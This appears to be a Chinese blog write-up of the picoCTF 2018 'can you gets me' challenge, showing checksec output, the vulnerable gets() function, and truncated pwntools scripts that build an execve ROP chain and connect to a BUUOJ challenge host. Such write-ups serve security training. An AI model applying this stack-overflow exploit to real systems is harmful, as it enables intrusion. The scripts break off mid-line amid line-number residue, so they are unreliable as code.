-
picoctf_2018_can_you_gets_me
picoctf_2018_can_you_gets_me
Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)- 1
- 2
- 3
- 4
- 5
32位,只开了NX
拿到这么大的程序,直接ROPchain看看
#!/usr/bin/env python2 # execve generated by ROPgadget from struct import pack # Padding goes here p = '' p += pack('- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
果不其然
然后去ida看看溢出点
int vuln() { char v1[24]; // [esp+0h] [ebp-18h] BYREF puts("GIVE ME YOUR NAME!"); return gets(v1); }- 1
- 2
- 3
- 4
- 5
- 6
- 7
秒了
思路
栈溢出直接ROPchain
from pwn import* from Yapack import * r,elf=rec("node4.buuoj.cn",25457,"./pwn",10) context(os='linux', arch='i386',log_level='debug') def pwn(): from struct import pack # Padding goes here p = cyclic(0x1c)+b'' p += pack('- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
一个小技巧:用ROPchain,可以用def写好,这样复制过去就不用删空格了
java101-arraylist的遍历和增加
vue中动态引入图片
点与多边形关系
Android面试每日一题(4): 哪些情况下会导致oom问题?
JavaFX开发教程——前后端交互(Controller)
js如何实现数组去重的常用方法
金仓数据库KingbaseES本地化支持(4. 排序规则)
Python基础--PART2
Linux命令-切换目录